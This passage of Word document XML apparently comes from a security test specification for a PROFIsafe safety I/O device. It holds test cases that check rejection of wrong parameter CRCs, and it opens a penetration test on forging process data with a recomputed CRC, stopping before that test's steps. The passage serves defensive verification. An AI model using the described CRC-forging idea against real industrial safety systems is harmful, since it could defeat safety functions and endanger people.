                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37D39179"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58B7064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3AD56D" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="091A8041" w14:textId="713D2DA4" w:rsidR="00B73A1A" w:rsidRPr="005D11F1" w:rsidRDefault="006A75E6"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A75E6">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ002-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="6D6B926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0794C6F"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4875E1FD" w14:textId="14195EF4" w:rsidR="00B73A1A" w:rsidRPr="00611347" w:rsidRDefault="00880B9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11347">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ-002 (EHSR 1.1.9 §1) → CR 3.4 → Asset C (config at rest)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00D67CA6" w14:paraId="068ED85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DD845D" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="172BCE1C" w14:textId="460909E3" w:rsidR="00B73A1A" w:rsidRPr="005D11F1" w:rsidRDefault="005B4994"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Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w14:paraId="5A8E938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10E8F72" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16A1DC56" w14:textId="0B8EBFD8" w:rsidR="00B73A1A" w:rsidRPr="005D11F1" w:rsidRDefault="00E669D0" w:rsidP="00E669D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E669D0">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-1 (Requirements-based Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="3183B69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BD818C" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="431FAEDA" w14:textId="691F920A" w:rsidR="00B73A1A" w:rsidRPr="005D11F1" w:rsidRDefault="00215272"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15272">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that the F-Device validates the parameter set and rejects a configuration whose iParCRC/F_ParCRC does not match, remaining in the safe (Parametrization) state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="09B36ED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5018193" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66527129" w14:textId="77777777" w:rsidR="004347AA" w:rsidRDefault="004347AA"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347AA">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Baseline. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AB385E0" w14:textId="77777777" w:rsidR="004347AA" w:rsidRDefault="004347AA"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347AA">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Present a configuration with a deliberately incorrect iParCRC (then F_ParCRC). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45D4A464" w14:textId="03CC2BA8" w:rsidR="00B73A1A" w:rsidRPr="00611347" w:rsidRDefault="004347AA"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fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00611347">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>3. Observe device state, diagnostics, qualifiers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="038C530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AEFD46" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29C307D5" w14:textId="77777777" w:rsidR="00C72177" w:rsidRDefault="00C72177"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C72177">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS if mismatch triggers EC3, the device stays in Parametrization, qualifiers remain bad, and no OPERATE handshake completes. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B374CDC" w14:textId="3A1038EA" w:rsidR="00B73A1A" w:rsidRPr="005D11F1" w:rsidRDefault="00C72177"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C72177">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>FAIL if a mismatched-CRC configuration is accepted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="395971AF" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="00AF57B2" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="376B0703"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6DE778E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F8E006" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29B7092B"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7236DE3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73925" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69F835DA" w14:textId="63C34365" w:rsidR="00B73A1A" w:rsidRPr="005D11F1" w:rsidRDefault="005E2237"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5E2237">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ002-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="2AAD33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DF88F2B" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E2E7CCA" w14:textId="77777777" w:rsidR="00463487" w:rsidRDefault="00463487"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3487">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">SPS 192.168.0.1, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66BB8E84" w14:textId="77777777" w:rsidR="00463487" w:rsidRDefault="00463487"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3487">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">SRIO DUT 192.168.0.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="039949B4" w14:textId="78762021" w:rsidR="00B73A1A" w:rsidRPr="005D11F1" w:rsidRDefault="00463487"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3487">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>laptop mirror</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00BB230F" w14:paraId="348FF8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FC11F" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12F0A253" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="005D11F1" w:rsidRDefault="00B73A1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B73A1A" w:rsidRPr="00316EA1" w14:paraId="0BF8098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38A437" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="220098F1" w14:textId="408B19CB" w:rsidR="00B73A1A" w:rsidRPr="005D11F1" w:rsidRDefault="00EC1E71"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EC1E71">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TIA Portal (manipulate F-parameter CRC field), Wireshark (`pn_rt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> || pnio’)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="34EE1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93424F" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B57D692" w14:textId="77777777" w:rsidR="00321789" w:rsidRDefault="00321789"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21789">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1) Baseline OPERATE; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C14C21D" w14:textId="77777777" w:rsidR="00321789" w:rsidRDefault="00321789"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21789">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">(2) force F_iPar_CRC wrong, download; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B413110" w14:textId="77777777" w:rsidR="00321789" w:rsidRDefault="00321789"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21789">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">(3) repeat for F_Par_CRC; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D63B39B" w14:textId="2367AC14" w:rsidR="00B73A1A" w:rsidRPr="005D11F1" w:rsidRDefault="00321789"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21789">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(4) read PLC diagnostic buffer for EC3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00AD4B09" w14:paraId="0095DB0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C3B61FF" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D2B48D4" w14:textId="22004B99" w:rsidR="00B73A1A" w:rsidRPr="005D11F1" w:rsidRDefault="00DB1113" w:rsidP="00655E93">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Pr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/ Fail</w:t>
            </w:r>
            <w:r w:rsidR="004C3E6B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">-state: </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00FD6890" w14:paraId="7E2687E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FFCE72" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29ADFE7E" w14:textId="77777777" w:rsidR="005E18DC" w:rsidRDefault="005E18DC"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5E18DC">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">TC01_iparcrc.pcapng, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59CC6A03" w14:textId="77777777" w:rsidR="005E18DC" w:rsidRDefault="005E18DC"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5E18DC">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PLC diagnostic-buffer export, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="639FA269" w14:textId="1308F5DA" w:rsidR="00B73A1A" w:rsidRPr="005D11F1" w:rsidRDefault="005E18DC"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5E18DC">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DUT FS-LED photo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="438DB544" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="223E1F18" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C83F33E" w14:textId="179A6412" w:rsidR="005D11F1" w:rsidRDefault="00CD7D37" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E404B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ002-03 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00E404B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Valid-CRC Injection over Modified Process Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC759D3" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="005D11F1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53CDB92F" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="005D11F1">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5D11F1" w14:paraId="0ACDC81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6462F7F" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D98D270" w14:textId="77777777" w:rsidR="005D11F1"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5D11F1" w14:paraId="71610FB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82C792" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B2EE703" w14:textId="63457FFA" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="00C0609A"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C0609A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ002-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="00316EA1" w14:paraId="56DDE63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A3DC95" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30520D88" w14:textId="4BC63A2C" w:rsidR="005D11F1" w:rsidRPr="00611347" w:rsidRDefault="00B6000E"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11347">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ-002 → CR 3.1(+RE1) → Asset C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="00D67CA6" w14:paraId="4A82A2E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D65EBF" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70973955" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="00B6000E"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Tampering</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FFD7BC9" w14:textId="428A7F9B" w:rsidR="00715CD0" w:rsidRPr="005D11F1" w:rsidRDefault="00715CD0"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5D11F1" w14:paraId="2E85B584"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0B0BD22" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="675477D3" w14:textId="6D0441E2" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="002C2DCC"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SVV-4 (Penetration Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="00316EA1" w14:paraId="64EAA28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9156F4" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14C1ABDB" w14:textId="26543EA7" w:rsidR="005D11F1" w:rsidRPr="005D11F1" w:rsidRDefault="00D17385"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17385">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate the central residual risk of RQ-002: because the 4-byte CRC (CRC-Seed24/32) is a non-secret checksum, an attacker who modifies the process data and recomputes a matching CRC produces a frame the F-Device cannot distinguish from a legitimate one</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D17385">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> protection against accidental but not intentional corruption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D11F1" w:rsidRPr="00FD6890" w14:paraId="7C5E33B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86A4188" w14:textId="77777777" w:rsidR="005D11F1" w:rsidRDefault="005D11F1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3210657C" w14:textId="77777777" w:rsidR="007D150A" w:rsidRDefault="007D150A"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D150A">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
